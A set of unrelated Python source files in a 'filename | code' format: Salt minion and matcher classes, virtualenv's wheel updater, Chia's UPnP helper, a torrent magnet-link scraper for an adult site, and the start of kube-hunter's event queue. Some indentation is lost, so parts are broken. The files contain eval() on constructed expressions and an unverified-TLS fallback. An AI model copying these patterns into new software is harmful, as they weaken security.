        self.raw_events = []
        self.event_forward_timeout = None

    def _process_event_socket(self):
        # Drain the local event bus, but never for longer than the
        # configured processing budget.
        tout = time.time() + self.opts['syndic_max_event_process_time']
        while tout > time.time():
            try:
                event = self.local.event.get_event_noblock()
            except zmq.ZMQError as e:
                # EAGAIN indicates no more events at the moment
                # EINTR some kind of signal maybe someone trying
                # to get us to quit so escape our timeout
                if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
                    break
                raise

            log.trace('Got event {0}'.format(event['tag']))
            if self.event_forward_timeout is None:
                # First buffered event starts the forward countdown.
                self.event_forward_timeout = (
                    time.time() + self.opts['syndic_event_forward_timeout']
                )
            if salt.utils.is_jid(event['tag']) and 'return' in event['data']:
                if 'jid' not in event['data']:
                    # Not a job return
                    continue
                jdict = self.jids.setdefault(event['tag'], {})
                if not jdict:
                    # First return for this jid: seed the metadata and
                    # pull the job load from the master job cache.
                    jdict['__fun__'] = event['data'].get('fun')
                    jdict['__jid__'] = event['data']['jid']
                    jdict['__load__'] = {}
                    fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                    )
                jdict[event['data']['id']] = event['data']['return']
            else:
                # Add generic event aggregation here
                if 'retcode' not in event['data']:
                    self.raw_events.append(event)

    def _forward_events(self):
        # Flush the buffered events and job returns up to the higher
        # master, then reset the aggregation buffers.
        log.trace('Forwarding events')
        if self.raw_events:
            self._fire_master(events=self.raw_events,
                              pretag=tagify(self.opts['id'], base='syndic'),
                              )
        for jid in self.jids:
            self._return_pub(self.jids[jid], '_syndic_return')
        self._reset_event_aggregation()

    def destroy(self):
        '''
        Tear down the syndic minion
        '''
        # We borrowed the local clients poller so give it back before
        # it's destroyed. Reset the local poller reference.
        self.poller = None
        super(Syndic, self).destroy()
        if hasattr(self, 'local'):
            del self.local
class Matcher(object):
    '''
    Use to return the value for matching calls from the master
    '''
    def __init__(self, opts, functions=None):
        self.opts = opts
        if functions is None:
            # Lazily load the full execution-module table when the caller
            # did not hand one in.
            functions = salt.loader.minion_mods(self.opts)
        self.functions = functions

    def confirm_top(self, match, data, nodegroups=None):
        '''
        Takes the data passed to a top file environment and determines if the
        data matches this minion
        '''
        matcher = 'compound'
        if not data:
            log.error('Received bad data when setting the match from the top '
                      'file')
            return False
        for item in data:
            if isinstance(item, dict):
                if 'match' in item:
                    matcher = item['match']
        if hasattr(self, matcher + '_match'):
            funcname = '{0}_match'.format(matcher)
            if matcher == 'nodegroup':
                return getattr(self, funcname)(match, nodegroups)
            return getattr(self, funcname)(match)
        else:
            log.error('Attempting to match with unknown matcher: {0}'.format(
                matcher
            ))
            return False

    def glob_match(self, tgt):
        '''
        Returns true if the passed glob matches the id
        '''
        # Fix: use isinstance() instead of the exact-type check
        # ``type(tgt) != str``, which wrongly rejected str subclasses.
        if not isinstance(tgt, str):
            return False
        return fnmatch.fnmatch(self.opts['id'], tgt)

    def pcre_match(self, tgt):
        '''
        Returns true if the passed pcre regex matches
        '''
        return bool(re.match(tgt, self.opts['id']))

    def list_match(self, tgt):
        '''
        Determines if this host is on the list
        '''
        if isinstance(tgt, string_types):
            tgt = tgt.split(',')
        return bool(self.opts['id'] in tgt)

    def grain_match(self, tgt, delim=':'):
        '''
        Reads in the grains glob match
        '''
        log.debug('grains target: {0}'.format(tgt))
        if delim not in tgt:
            log.error('Got insufficient arguments for grains match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['grains'], tgt, delim=delim)

    def grain_pcre_match(self, tgt, delim=':'):
        '''
        Matches a grain based on regex
        '''
        log.debug('grains pcre target: {0}'.format(tgt))
        if delim not in tgt:
            log.error('Got insufficient arguments for grains pcre match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['grains'], tgt,
                                        delim=delim, regex_match=True)

    def data_match(self, tgt):
        '''
        Match based on the local data store on the minion
        '''
        comps = tgt.split(':')
        if len(comps) < 2:
            return False
        val = self.functions['data.getval'](comps[0])
        if val is None:
            # The value is not defined
            return False
        if isinstance(val, list):
            # We are matching a single component to a single list member
            for member in val:
                if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
                    return True
            return False
        if isinstance(val, dict):
            if comps[1] in val:
                return True
            return False
        return bool(fnmatch.fnmatch(
            val,
            comps[1],
        ))

    def pillar_match(self, tgt, delim=':'):
        '''
        Reads in the pillar glob match
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delim not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['pillar'], tgt, delim=delim)

    def ipcidr_match(self, tgt):
        '''
        Matches based on ip address or CIDR notation
        '''
        num_parts = len(tgt.split('/'))
        if num_parts > 2:
            # Target is not valid CIDR
            return False
        elif num_parts == 2:
            # Target is CIDR
            return salt.utils.network.in_subnet(
                tgt,
                addrs=self.opts['grains'].get('ipv4', [])
            )
        else:
            # Target is an IPv4 address; import locally to keep the
            # module namespace unchanged.
            import socket
            try:
                socket.inet_aton(tgt)
            except socket.error:
                # Not a valid IPv4 address
                return False
            else:
                return tgt in self.opts['grains'].get('ipv4', [])

    def range_match(self, tgt):
        '''
        Matches based on range cluster
        '''
        if HAS_RANGE:
            range_ = seco.range.Range(self.opts['range_server'])
            try:
                return self.opts['grains']['fqdn'] in range_.expand(tgt)
            except seco.range.RangeException as exc:
                log.debug('Range exception in compound match: {0}'.format(exc))
                return False
        return False

    def compound_match(self, tgt):
        '''
        Runs the compound target check
        '''
        if not isinstance(tgt, string_types):
            log.debug('Compound target received that is not a string')
            return False
        ref = {'G': 'grain',
               'P': 'grain_pcre',
               'I': 'pillar',
               'L': 'list',
               'S': 'ipcidr',
               'E': 'pcre'}
        if HAS_RANGE:
            ref['R'] = 'range'
        results = []
        opers = ['and', 'or', 'not', '(', ')']
        tokens = tgt.split()
        for match in tokens:
            # Try to match tokens from the compound target, first by using
            # the 'G, X, I, L, S, E' matcher types, then by hostname glob.
            if '@' in match and match[1] == '@':
                comps = match.split('@')
                matcher = ref.get(comps[0])
                if not matcher:
                    # If an unknown matcher is called at any time, fail out
                    return False
                results.append(
                    str(
                        getattr(self, '{0}_match'.format(matcher))(
                            '@'.join(comps[1:])
                        )
                    )
                )
            elif match in opers:
                # We didn't match a target, so append a boolean operator or
                # subexpression
                if results or match in ['(', ')']:
                    if match == 'not':
                        # Implicit 'and' before a leading 'not'.
                        if results[-1] == 'and':
                            pass
                        elif results[-1] == 'or':
                            pass
                        else:
                            results.append('and')
                    results.append(match)
                else:
                    # seq start with oper, fail
                    if match not in ['(', ')']:
                        return False
            else:
                # The match is not explicitly defined, evaluate it as a glob
                results.append(str(self.glob_match(match)))
        results = ' '.join(results)
        try:
            # SECURITY NOTE: the boolean expression is evaluated with
            # eval(). The tokens are constrained to 'True'/'False', the
            # known operators and parentheses above, but this still
            # deserves scrutiny if the tokenizing rules ever change.
            return eval(results)  # pylint: disable=W0123
        except Exception:
            log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
            return False
        return False

    def nodegroup_match(self, tgt, nodegroups):
        '''
        This is a compatibility matcher and is NOT called when using
        nodegroups for remote execution, but is called when the nodegroups
        matcher is used in states
        '''
        if tgt in nodegroups:
            return self.compound_match(
                salt.utils.minions.nodegroup_comp(tgt, nodegroups)
            )
        return False
class ProxyMinion(Minion):
    '''
    This class instantiates a 'proxy' minion--a minion that does not manipulate
    the host it runs on, but instead manipulates a device that cannot run a minion.
    '''
    def __init__(self, opts, timeout=60, safe=True):  # pylint: disable=W0231
        '''
        Pass in the options dict

        timeout/safe are forwarded to authenticate(). Note this does NOT
        call Minion.__init__ (hence the pylint W0231 suppression); it
        performs its own, proxy-specific setup instead.
        '''
        self._running = None
        # Warn if ZMQ < 3.2
        if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
                        zmq.zmq_version_info() < (3, 2)):
            # PyZMQ 2.1.9 does not have zmq_version_info
            log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
                        'are known connection keep-alive issues with ZMQ < '
                        '3.2 which may result in loss of contact with '
                        'minions. Please upgrade your ZMQ!')
        # Late setup the of the opts grains, so we can log from the grains
        # module
        # print opts['proxymodule']
        # Resolve and instantiate the configured proxy connection class;
        # the proxied device supplies this minion's id.
        fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
        self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
        opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
        opts['id'] = opts['proxyobject'].id(opts)
        opts.update(resolve_dns(opts))
        self.opts = opts
        self.authenticate(timeout, safe)
        self.opts['pillar'] = salt.pillar.get_pillar(
            opts,
            opts['grains'],
            opts['id'],
            opts['environment'],
        ).compile_pillar()
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.functions, self.returners = self._load_modules()
        self.matcher = Matcher(self.opts, self.functions)
        self.proc_dir = get_proc_dir(opts['cachedir'])
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)
        self.grains_cache = self.opts['grains']
        # self._running = True

    def _prep_mod_opts(self):
        '''
        Returns a copy of the opts with key bits stripped out
        '''
        return super(ProxyMinion, self)._prep_mod_opts()

    def _load_modules(self, force_refresh=False):
        '''
        Return the functions and the returners loaded up from the loader
        module
        '''
        return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
periodic_update.py | """
Periodically update bundled versions.
"""
from __future__ import absolute_import, unicode_literals
import json
import logging
import os
import ssl
import subprocess
import sys
from datetime import datetime, timedelta
from itertools import groupby
from shutil import copy2
from textwrap import dedent
from threading import Thread
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from virtualenv.app_data import AppDataDiskFolder
from virtualenv.info import PY2
from virtualenv.util.path import Path
from virtualenv.util.subprocess import DETACHED_PROCESS, Popen
from ..wheels.embed import BUNDLE_SUPPORT
from ..wheels.util import Wheel
if PY2:
# on Python 2 datetime.strptime throws the error below if the import did not trigger on main thread
# Failed to import _strptime because the import lock is held by
try:
import _strptime # noqa
except ImportError: # pragma: no cov
pass # pragma: no cov
def periodic_update(distribution, for_py_version, wheel, search_dirs, app_data, do_periodic_update):
    """Return the wheel to seed with, preferring a newer periodically-updated one.

    Walks the update log's known versions grouped by minor version and
    swaps in the latest acceptable patch release, unless the currently
    selected wheel is already that version.
    """
    if do_periodic_update:
        handle_auto_update(distribution, for_py_version, wheel, search_dirs, app_data)

    now = datetime.now()

    u_log = UpdateLog.from_app_data(app_data, distribution, for_py_version)
    u_log_older_than_hour = now - u_log.completed > timedelta(hours=1) if u_log.completed is not None else False
    for _, group in groupby(u_log.versions, key=lambda v: v.wheel.version_tuple[0:2]):
        # assumes versions are ordered newest-first within a minor — TODO confirm
        version = next(group)  # use only latest patch version per minor, earlier assumed to be buggy
        if wheel is not None and Path(version.filename).name == wheel.name:
            break
        if u_log.periodic is False or (u_log_older_than_hour and version.use(now)):
            updated_wheel = Wheel(app_data.house / version.filename)
            # Fix: the "periodically " prefix must reflect u_log.periodic;
            # the old ``if updated_wheel`` test was always true (a Wheel
            # instance is truthy), so manual updates were mislabeled.
            logging.debug("using %supdated wheel %s", "periodically " if u_log.periodic else "", updated_wheel)
            wheel = updated_wheel
            break

    return wheel
def handle_auto_update(distribution, for_py_version, wheel, search_dirs, app_data):
    """Spawn a background update for *distribution* if the update log says one is due."""
    embed_update_log = app_data.embed_update_log(distribution, for_py_version)
    u_log = UpdateLog.from_dict(embed_update_log.read())
    if u_log.needs_update:
        # record the start before triggering so overlapping calls do not double-spawn
        u_log.periodic = True
        u_log.started = datetime.now()
        embed_update_log.write(u_log.to_dict())
        trigger_update(distribution, for_py_version, wheel, search_dirs, app_data, periodic=True)
# timestamp format used to persist datetimes in the on-disk update log
DATETIME_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"


def dump_datetime(value):
    """Serialize a datetime to its log string form; ``None`` passes through unchanged."""
    if value is None:
        return None
    return value.strftime(DATETIME_FMT)


def load_datetime(value):
    """Parse a timestamp produced by :func:`dump_datetime`; ``None`` passes through unchanged."""
    if value is None:
        return None
    return datetime.strptime(value, DATETIME_FMT)
class NewVersion(object):
    """A wheel version discovered by the periodic updater, with provenance dates."""

    def __init__(self, filename, found_date, release_date):
        self.filename = filename  # wheel file name within the app-data wheelhouse
        self.found_date = found_date  # when the updater downloaded/recorded it
        self.release_date = release_date  # PyPI upload time; None when the lookup failed

    @classmethod
    def from_dict(cls, dictionary):
        """Rebuild from the JSON-friendly dict produced by :meth:`to_dict`."""
        return cls(
            filename=dictionary["filename"],
            found_date=load_datetime(dictionary["found_date"]),
            release_date=load_datetime(dictionary["release_date"]),
        )

    def to_dict(self):
        """Serialize to a JSON-friendly dict (inverse of :meth:`from_dict`)."""
        return {
            "filename": self.filename,
            "release_date": dump_datetime(self.release_date),
            "found_date": dump_datetime(self.found_date),
        }

    def use(self, now):
        """True once the version is at least 28 days old (release date, else found date)."""
        compare_from = self.release_date or self.found_date
        return now - compare_from >= timedelta(days=28)

    def __repr__(self):
        # fix: the original format string had a stray ")" after the filename field
        return "{}(filename={}, found_date={}, release_date={})".format(
            self.__class__.__name__, self.filename, self.found_date, self.release_date,
        )

    def __eq__(self, other):
        return type(self) == type(other) and all(
            getattr(self, k) == getattr(other, k) for k in ["filename", "release_date", "found_date"]
        )

    def __ne__(self, other):
        return not (self == other)

    @property
    def wheel(self):
        return Wheel(Path(self.filename))
class UpdateLog(object):
    """Persisted record of periodic update runs for one distribution/python pair."""

    def __init__(self, started, completed, versions, periodic):
        self.started = started  # when the last run began (datetime or None)
        self.completed = completed  # when the last run finished (datetime or None)
        self.versions = versions  # NewVersion entries, newest first
        self.periodic = periodic  # True when the run was triggered automatically

    @classmethod
    def from_dict(cls, dictionary):
        """Rebuild from the raw dict read off disk (``None`` means an empty log)."""
        if dictionary is None:
            dictionary = {}
        return cls(
            load_datetime(dictionary.get("started")),
            load_datetime(dictionary.get("completed")),
            [NewVersion.from_dict(v) for v in dictionary.get("versions", [])],
            dictionary.get("periodic"),
        )

    @classmethod
    def from_app_data(cls, app_data, distribution, for_py_version):
        """Load the update log stored in *app_data* for the given distribution/python."""
        return cls.from_dict(app_data.embed_update_log(distribution, for_py_version).read())

    def to_dict(self):
        """Serialize to a JSON-friendly dict (inverse of :meth:`from_dict`)."""
        return {
            "started": dump_datetime(self.started),
            "completed": dump_datetime(self.completed),
            "periodic": self.periodic,
            "versions": [version.to_dict() for version in self.versions],
        }

    @property
    def needs_update(self):
        """Whether a new update run should be kicked off now."""
        now = datetime.now()
        if self.completed is not None and now - self.completed <= timedelta(days=14):
            return False  # refreshed recently enough, nothing to do
        return self._check_start(now)

    def _check_start(self, now):
        # a run started within the last hour is assumed to still be in flight
        if self.started is None:
            return True
        return now - self.started > timedelta(hours=1)
def trigger_update(distribution, for_py_version, wheel, search_dirs, app_data, periodic):
    """Launch :func:`do_update` in a detached child interpreter so the download runs in the background."""
    wheel_path = None if wheel is None else str(wheel.path)
    # build a small "-c" script that re-imports the updater and runs it with repr'd arguments
    cmd = [
        sys.executable,
        "-c",
        dedent(
            """
        from virtualenv.report import setup_report, MAX_LEVEL
        from virtualenv.seed.wheels.periodic_update import do_update
        setup_report(MAX_LEVEL, show_pid=True)
        do_update({!r}, {!r}, {!r}, {!r}, {!r}, {!r})
        """,
        )
        .strip()
        .format(distribution, for_py_version, wheel_path, str(app_data), [str(p) for p in search_dirs], periodic),
    ]
    # escape hatch for debugging: run inline and show the child's output
    debug = os.environ.get(str("_VIRTUALENV_PERIODIC_UPDATE_INLINE")) == str("1")
    pipe = None if debug else subprocess.PIPE
    kwargs = {"stdout": pipe, "stderr": pipe}
    if not debug and sys.platform == "win32":
        kwargs["creationflags"] = DETACHED_PROCESS
    process = Popen(cmd, **kwargs)
    logging.info(
        "triggered periodic upgrade of %s%s (for python %s) via background process having PID %d",
        distribution,
        "" if wheel is None else "=={}".format(wheel.version),
        for_py_version,
        process.pid,
    )
    if debug:
        process.communicate()  # in debug mode wait for the child; otherwise it stays a background process
def do_update(distribution, for_py_version, embed_filename, app_data, search_dirs, periodic):
    """Run one update pass and return the list of newly found versions.

    Always logs a completion line, even when the underlying run raises.
    """
    versions = None
    try:
        versions = _run_do_update(app_data, distribution, embed_filename, for_py_version, periodic, search_dirs)
        return versions
    finally:
        logging.debug("done %s %s with %s", distribution, for_py_version, versions)
def _run_do_update(app_data, distribution, embed_filename, for_py_version, periodic, search_dirs):
    """Download newer wheels for *distribution* and merge them into the update log.

    Walks available versions newest-first until one is old enough to trust
    (``use``), already logged, or not newer than the embedded wheel.
    Returns the list of newly recorded NewVersion entries.
    """
    from virtualenv.seed.wheels import acquire
    wheel_filename = None if embed_filename is None else Path(embed_filename)
    embed_version = None if wheel_filename is None else Wheel(wheel_filename).version_tuple
    # the detached child process passes plain strings; normalise to the rich types
    app_data = AppDataDiskFolder(app_data) if isinstance(app_data, str) else app_data
    search_dirs = [Path(p) if isinstance(p, str) else p for p in search_dirs]
    wheelhouse = app_data.house
    embed_update_log = app_data.embed_update_log(distribution, for_py_version)
    u_log = UpdateLog.from_dict(embed_update_log.read())
    now = datetime.now()
    if wheel_filename is not None:
        # make sure the embedded wheel itself is available in the wheelhouse
        dest = wheelhouse / wheel_filename.name
        if not dest.exists():
            copy2(str(wheel_filename), str(wheelhouse))
    last, last_version, versions = None, None, []
    while last is None or not last.use(now):
        download_time = datetime.now()
        dest = acquire.download_wheel(
            distribution=distribution,
            version_spec=None if last_version is None else "<{}".format(last_version),
            for_py_version=for_py_version,
            search_dirs=search_dirs,
            app_data=app_data,
            to_folder=wheelhouse,
        )
        # stop when nothing was found or we reached the newest version already logged
        if dest is None or (u_log.versions and u_log.versions[0].filename == dest.name):
            break
        release_date = release_date_for_wheel_path(dest.path)
        last = NewVersion(filename=dest.path.name, release_date=release_date, found_date=download_time)
        logging.info("detected %s in %s", last, datetime.now() - download_time)
        versions.append(last)
        last_wheel = Wheel(Path(last.filename))
        last_version = last_wheel.version
        if embed_version is not None:
            if embed_version >= last_wheel.version_tuple:  # stop download if we reach the embed version
                break
    u_log.periodic = periodic
    if not u_log.periodic:
        u_log.started = now
    # newest finds go first, ahead of the previously recorded versions
    u_log.versions = versions + u_log.versions
    u_log.completed = datetime.now()
    embed_update_log.write(u_log.to_dict())
    return versions
def release_date_for_wheel_path(dest):
    """Best-effort lookup of the PyPI upload time for the wheel at *dest*; None on any failure."""
    wheel = Wheel(dest)
    # the most accurate is to ask PyPi - e.g. https://pypi.org/pypi/pip/json,
    # see https://warehouse.pypa.io/api-reference/json/ for more details
    content = _pypi_get_distribution_info_cached(wheel.distribution)
    if content is not None:
        try:
            upload_time = content["releases"][wheel.version][0]["upload_time"]
            return datetime.strptime(upload_time, "%Y-%m-%dT%H:%M:%S")
        except Exception as exception:
            logging.error("could not load release date %s because %r", content, exception)
    return None
def _request_context():
yield None
# fallback to non verified HTTPS (the information we request is not sensitive, so fallback)
yield ssl._create_unverified_context() # noqa
# process-wide memoisation of PyPI JSON lookups, keyed by distribution name
_PYPI_CACHE = {}
def _pypi_get_distribution_info_cached(distribution):
    """Return the PyPI JSON metadata for *distribution*, fetching at most once per process."""
    if distribution not in _PYPI_CACHE:
        _PYPI_CACHE[distribution] = _pypi_get_distribution_info(distribution)
    return _PYPI_CACHE[distribution]
def _pypi_get_distribution_info(distribution):
    """Fetch the PyPI JSON metadata for *distribution*; returns None if every attempt fails."""
    content, url = None, "https://pypi.org/pypi/{}/json".format(distribution)
    try:
        # try a verified HTTPS request first, then fall back to an unverified context
        for context in _request_context():
            try:
                with urlopen(url, context=context) as file_handler:
                    content = json.load(file_handler)
                break
            except URLError as exception:
                logging.error("failed to access %s because %r", url, exception)
    except Exception as exception:
        logging.error("failed to access %s because %r", url, exception)
    return content
def manual_upgrade(app_data):
    """Upgrade every bundled wheel for every supported python version, one thread per distribution."""
    workers = []
    for for_py_version, distribution_to_package in BUNDLE_SUPPORT.items():
        # load extra search dir for the given for_py
        for distribution in distribution_to_package.keys():
            worker = Thread(target=_run_manual_upgrade, args=(app_data, distribution, for_py_version))
            worker.start()
            workers.append(worker)
    for worker in workers:
        worker.join()
def _run_manual_upgrade(app_data, distribution, for_py_version):
    """Worker body for manual_upgrade: refresh one distribution for one python version."""
    start = datetime.now()
    from .bundle import from_bundle
    current = from_bundle(
        distribution=distribution,
        version=None,
        for_py_version=for_py_version,
        search_dirs=[],
        app_data=app_data,
        do_periodic_update=False,
    )
    logging.warning(
        "upgrade %s for python %s with current %s",
        distribution,
        for_py_version,
        "" if current is None else current.name,
    )
    versions = do_update(
        distribution=distribution,
        for_py_version=for_py_version,
        embed_filename=current.path,
        app_data=app_data,
        search_dirs=[],
        periodic=False,
    )
    # two-stage formatting: the {} placeholder is filled here, the %s placeholders
    # are left in place for logging to interpolate lazily below
    msg = "upgraded %s for python %s in %s {}".format(
        "new entries found:\n%s" if versions else "no new versions found",
    )
    args = [
        distribution,
        for_py_version,
        datetime.now() - start,
    ]
    if versions:
        args.append("\n".join("\t{}".format(v) for v in versions))
    logging.warning(msg, *args)
__all__ = (
"periodic_update",
"do_update",
"manual_upgrade",
"NewVersion",
"UpdateLog",
"load_datetime",
"dump_datetime",
"trigger_update",
"release_date_for_wheel_path",
)
|
upnp.py | import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
    """Best-effort UPnP port forwarding, run on a dedicated background thread.

    Commands ("remap"/"release"/"shutdown") are sent through a queue so that
    every miniupnpc call happens on the one worker thread. Any UPnP failure
    is logged and otherwise ignored — forwarding is optional.
    """

    # NOTE(review): these are class attributes, so the queue (and thread slot)
    # is shared by every UPnP instance; fine for the intended single-instance
    # use, but confirm before constructing more than one.
    thread: Optional[threading.Thread] = None
    queue: Queue = Queue()

    def __init__(self):
        def run():
            try:
                self.upnp = miniupnpc.UPnP()
                self.upnp.discoverdelay = 30
                self.upnp.discover()
                self.upnp.selectigd()
                keep_going = True
                while keep_going:
                    msg = self.queue.get()
                    if msg[0] == "remap":
                        port = msg[1]
                        log.info(f"Attempting to enable UPnP (open up port {port})")
                        try:
                            # drop any stale mapping first; failure here is expected
                            self.upnp.deleteportmapping(port, "TCP")
                        # fix: was a bare "except:", which also swallows
                        # KeyboardInterrupt/SystemExit; narrowed to Exception
                        except Exception:
                            log.info("Removal of previous portmapping failed. This does not indicate an error")
                        self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "chia", "")
                        log.info(
                            f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
                            f"external: {self.upnp.externalipaddress()}"
                        )
                    elif msg[0] == "release":
                        port = msg[1]
                        log.info(f"UPnP, releasing port {port}")
                        self.upnp.deleteportmapping(port, "TCP")
                        log.info(f"UPnP, Port {port} closed")
                    elif msg[0] == "shutdown":
                        keep_going = False
            except Exception as e:
                log.info(
                    "UPnP failed. This is not required to run chia, it allows incoming connections from other peers."
                )
                log.info(e)

        self.thread = threading.Thread(target=run)
        self.thread.start()

    def remap(self, port):
        """Ask the worker to (re)forward TCP *port* on the gateway."""
        self.queue.put(("remap", port))

    def release(self, port):
        """Ask the worker to remove the TCP *port* forwarding."""
        self.queue.put(("release", port))

    def shutdown(self):
        """Stop and join the worker thread; safe to call repeatedly."""
        if not self.thread:
            return
        self.queue.put(("shutdown",))
        log.info("UPnP, shutting down thread")
        self.thread.join()
        self.thread = None

    # this is here just in case the UPnP object is destroyed non-gracefully,
    # e.g. via an exception before the main thread can call shutdown()
    def __del__(self):
        self.shutdown()
|
magnet.py | # coding: utf-8
import re, os
import time
from queue import Queue
import threading
from app.utils.func_requests import get_html_html
from bs4 import BeautifulSoup
from jinja2 import PackageLoader,Environment
def sukebei_findindex(searchid):
    """Search sukebei.nyaa.si for *searchid*; return ({title: detail_page_url}, result_count)."""
    url = 'https://sukebei.nyaa.si/?q={}'.format(searchid)
    r = get_html_html(url)
    html = r.html.html
    #titleall = r.html.find('td:nth-child(2)>a:nth-child(1)')
    #maglink = r.html.find('td:nth-child(3)>a:nth-last-child(1)')
    #sizeall = r.html.find('td:nth-child(4)')
    soup = BeautifulSoup(html,'lxml')
    titleall = soup.find('tbody').find_all('a',href=re.compile('view'))
    # each result row links to /view/<id> with the entry title in the title attribute
    title = re.findall(r'<a href=\"(/view/\d+)\" title=\"(.*?)\">.*?</a>',str(titleall))
    searchdata = {}
    urlint = 0
    for i in title:
        # map result title -> absolute detail-page URL
        searchdata[i[1]] = 'https://sukebei.nyaa.si' + i[0]
        urlint += 1
    #magnetall = soup.find('tbody').find_all('a',href=re.compile('magnet'))
    #magnet = re.findall(r'''<a href=\"(magnet:\?xt=urn:btih:.*?)\"><i class=\"fa fa-fw fa-magnet\"></i></a>''',str(magnetall))
    #searchdata['magnet'] = magnet
    #sizeall = soup.find('tbody').find_all('td',attrs = {'class' : 'text-center'})
    #size = re.findall(r'<td class=\"text-center\">([\d.]*?) ([GiBMiBBytes]*?)</td>',str(sizeall))
    return (searchdata, urlint)
def producer(in_q, titledata):
    """Feed every detail-page URL from *titledata* (a title -> url mapping) into the work queue."""
    for url in titledata.values():
        in_q.put(url)
def sukebei_one(in_q, jsondata):
    """Consumer: fetch one detail page from the queue, scrape its metadata, append to *jsondata*.

    Entries with missing fields or containing spam keywords (nolike_list) are skipped.
    The bare excepts are deliberate best-effort scraping: any parse failure just
    marks the entry as unusable instead of crashing the worker.
    """
    url = in_q.get()
    #url = 'https://sukebei.nyaa.si/view/3039545'
    time.sleep(2)  # throttle requests to the site
    r = get_html_html(url)
    html = r.html.html
    soup = BeautifulSoup(html,'lxml')
    onedata = {}
    nolike = 0  # set to 1 when the entry should be discarded
    onedata['url'] = url
    try:
        title = soup.find('h3', attrs={'class' : 'panel-title'}).string.replace('\n','').replace('\t','').replace('+','').replace(' ','').replace('[','').replace(']','')
        onedata['title'] = title
    except:
        onedata['title'] = '---'
        nolike = 1
    try:
        magnetall = soup.find('div', attrs={'class' : 'panel-footer clearfix'})
        magnet = re.findall(r'''(magnet:\?xt=urn:btih:.*?)\"><i class=\"fa fa-magnet fa-fw\">''',str(magnetall))[0]
        onedata['magnet'] = magnet
    except:
        onedata['magnet'] = '---'
        nolike = 1
    try:
        sizeall = soup.find('div', attrs={'class' : 'panel-body'})
        size = re.findall(r'<div class=\"col-md-1\">File size:</div>[\s\S]*?div class=\"col-md-5\">(.*?)</div>',str(sizeall))
        onedata['size'] = size[0]
    except:
        onedata['size'] = '---'
        nolike = 1
    try:
        fileindexall = soup.find('div', attrs={'class' : 'torrent-file-list panel-body'})
        fileindex_1 = re.findall(r'<li><i class=\"fa fa-file\"></i>(.*?) <span class=\"file-size\">\(.*?\)</span></li>',str(fileindexall))
        fileindex = ','.join(fileindex_1)
        onedata['fileindex'] = fileindex
    except:
        onedata['fileindex'] = '---'
        nolike = 1
    try:
        # fileindex_1 is undefined when the file-list parse above failed
        strfileindex = ''.join(fileindex_1)
    except:
        pass
    try:
        # spam/advert keywords; entries whose file list contains any of them are dropped
        nolike_list = ["第一会所","宣传","論壇","澳门皇冠赌场","0.85或以上版本","魔王","赌场"]
        for i in nolike_list:
            if i in strfileindex:
                nolike = 1
                break
    except:
        nolike = 1
    if nolike == 0:
        #print(onedata)
        jsondata.append(onedata)
    in_q.task_done()
def sukebei_thread(searchid):
    """Scrape all search results for *searchid* concurrently; return (entries, elapsed_seconds_str)."""
    start = time.time()
    #searchlist = searchid.split(',')
    #print(searchlist)
    #leng2 = len(searchlist)
    titledata, urlint = sukebei_findindex(searchid)
    queue = Queue()
    jsondata = []
    producer_thread = threading.Thread(target=producer, args=(queue,titledata))
    #producer_thread.daemon = True
    producer_thread.start()
    # one daemon consumer per result; queue.join() returns once every task_done() was called
    for i in range(1,int(urlint)+1):
        consumer_thread = threading.Thread(target=sukebei_one, args=(queue, jsondata))
        consumer_thread.daemon = True
        consumer_thread.start()
    queue.join()
    end = time.time()
    usetime = str(end - start)
    return (jsondata,usetime)
def template_magnet(alldataa,usetimee,searchidd):
    """Render the scraped entries into the magnet.md Jinja2 template and return the text."""
    #print(ciddataa_performers)
    env = Environment(loader=PackageLoader(__name__,"templates")) # create a package loader object
    template = env.get_template('magnet.md') # load the template file
    temp_out = template.render(alldata = alldataa,usetime = usetimee, searchid = searchidd)
    #print(temp_out) # rendered result
    return (temp_out)
def sukebei(searchid):
    """Run the full search pipeline for *searchid* and return the rendered markdown."""
    results, elapsed = sukebei_thread(searchid)
    return template_magnet(results, elapsed, searchid)
if __name__ == "__main__":
print(sukebei('SSNI-848'))
|
handler.py | import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import get_config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue):
    """Pub/sub event bus: hunters subscribe to event classes; published events are
    matched by MRO, filtered, and queued as instantiated hook objects for a pool
    of daemon worker threads to execute.
    """
    def __init__(self, num_worker=10):
        # num_worker: size of the daemon worker pool executing hooks
        super().__init__()
        self.passive_hunters = dict()
        self.active_hunters = dict()
        self.all_hunters = dict()
        # event class -> list of (hook class, predicate) registrations
        self.hooks = defaultdict(list)
        self.filters = defaultdict(list)
        self.running = True
        self.workers = list()
        for _ in range(num_worker):
            t = Thread(target=self.worker)
            t.daemon = True
            t.start()
            self.workers.append(t)
        t = Thread(target=self.notifier)
        t.daemon = True
        t.start()
    # decorator wrapping for easy subscription
    def subscribe(self, event, hook=None, predicate=None):
